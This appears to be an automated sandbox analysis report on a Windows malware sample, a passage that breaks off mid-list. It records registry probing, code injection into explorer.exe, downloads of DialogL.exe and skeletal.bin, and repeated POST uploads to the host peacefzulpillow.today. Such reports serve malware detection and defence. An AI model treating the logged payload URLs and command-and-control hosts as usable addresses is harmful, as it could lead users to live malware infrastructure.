                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp, Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdbl` source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbph(zg source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Adobe QT32 Server.pdb source: Server.exe, 0000000C.00000002.2382705300.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000C.00000000.2328182678.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000002.2449639002.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000000.2399740812.00000000004BB000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvatransport\lib\win\release\32\dvatransport.pdb source: Server.exe, 0000000C.00000002.2383495933.0000000000824000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000002.2450849542.0000000000BA4000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdbP6 source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009D44A0 ??2@YAPAXI@Z,GetLogicalDriveStringsW,GetDriveTypeW,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@ABV12@II@Z,?append@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBGI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_009D44A0

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 62.60.234.80 1466Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 15.197.198.189 8545Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 3.161.82.59 80Jump to behavior
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 185.21.13.144 ports 27435,0,2,27085,5,7,8
                  Source: global trafficTCP traffic: 192.168.2.4:49733 -> 77.238.237.190:12113
                  Source: global trafficTCP traffic: 192.168.2.4:49734 -> 15.197.198.189:8545
                  Source: global trafficTCP traffic: 192.168.2.4:49737 -> 62.60.234.80:1466
                  Source: global trafficTCP traffic: 192.168.2.4:49746 -> 185.21.13.144:27085
                  Source: global trafficHTTP traffic detected: GET /temp/DialogL.exe HTTP/1.1Connection: Keep-AliveHost: www.suarakutim.com
                  Source: global trafficHTTP traffic detected: GET /file_premium/tgt65hk2h8vsbrn/skeletal.bin/file HTTP/1.1Connection: Keep-AliveHost: www.mediafire.com
                  Source: global trafficHTTP traffic detected: GET /2286;8aak5qqtt4pgkhxjqG-hwmgKPucfnwaQD9mlEAws51nokTzIwYnw40rg7_sZ7wmnZvpNXDxIjDHYnGjUnzSw1al_AqfnW1WfDfoFHUrZOfxQjOZ6avzOuDi8MAqC2xtRl6t7S9eEpZv1D6Z3Z5m-Sl1s44ShFoY38F2AMeLZYOOEPTvAXOEOnMZfAaFW3Om14U9A/tgt65hk2h8vsbrn/skeletal.bin HTTP/1.1Connection: Keep-AliveHost: ultra.mediafirecdn.com
                  Source: Joe Sandbox ViewIP Address: 62.60.234.80 62.60.234.80
                  Source: Joe Sandbox ViewASN Name: ASLINE-AS-APASLINELIMITEDHK ASLINE-AS-APASLINELIMITEDHK
                  Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.72.2:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 191.101.230.18:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.17.151.117:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.18.36.145:443
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0RypXGD87User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19587Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=zOWFu04pqA92User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8754Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A97veik84F30DFLM4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NMjdjlkBp9WronoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2394Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=qN2UCTdwNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585992Host: peacefzulpillow.today
                  Source: global trafficHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 95Host: peacefzulpillow.today
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.238.237.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.196.157
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_007F4040 ?system_category@system@boost@@YAABVerror_category@12@XZ,?system_category@system@boost@@YAABVerror_category@12@XZ,WSASetLastError,WSARecv,?system_category@system@boost@@YAABVerror_category@12@XZ,WSAGetLastError,?system_category@system@boost@@YAABVerror_category@12@XZ,?system_category@system@boost@@YAABVerror_category@12@XZ,12_2_007F4040
                  Source: global trafficHTTP traffic detected: GET /temp/DialogL.exe HTTP/1.1Connection: Keep-AliveHost: www.suarakutim.com
                  Source: global trafficHTTP traffic detected: GET /file_premium/tgt65hk2h8vsbrn/skeletal.bin/file HTTP/1.1Connection: Keep-AliveHost: www.mediafire.com
                  Source: global trafficHTTP traffic detected: GET /2286;8aak5qqtt4pgkhxjqG-hwmgKPucfnwaQD9mlEAws51nokTzIwYnw40rg7_sZ7wmnZvpNXDxIjDHYnGjUnzSw1al_AqfnW1WfDfoFHUrZOfxQjOZ6avzOuDi8MAqC2xtRl6t7S9eEpZv1D6Z3Z5m-Sl1s44ShFoY38F2AMeLZYOOEPTvAXOEOnMZfAaFW3Om14U9A/tgt65hk2h8vsbrn/skeletal.bin HTTP/1.1Connection: Keep-AliveHost: ultra.mediafirecdn.com
                  Source: global trafficHTTP traffic detected: GET /x.cer HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x.ss2.us
                  Source: global trafficDNS traffic detected: DNS query: peacefzulpillow.today
                  Source: global trafficDNS traffic detected: DNS query: www.suarakutim.com
                  Source: global trafficDNS traffic detected: DNS query: www.mediafire.com
                  Source: global trafficDNS traffic detected: DNS query: ultra.mediafirecdn.com
                  Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.binance.org
                  Source: global trafficDNS traffic detected: DNS query: x.ss2.us
                  Source: unknownHTTP traffic detected: POST /Kdzw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: peacefzulpillow.today
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203A(1).crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203A(1
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                  Source: explorer.exe, 00000012.00000003.2508747671.0000000026785000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                  Source: Server.exe, 0000000C.00000003.2353968785.000000000C19E000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2351521886.0000000001F30000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C058000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421784555.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: explorer.exe, 00000012.00000003.2506844012.000000000334C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 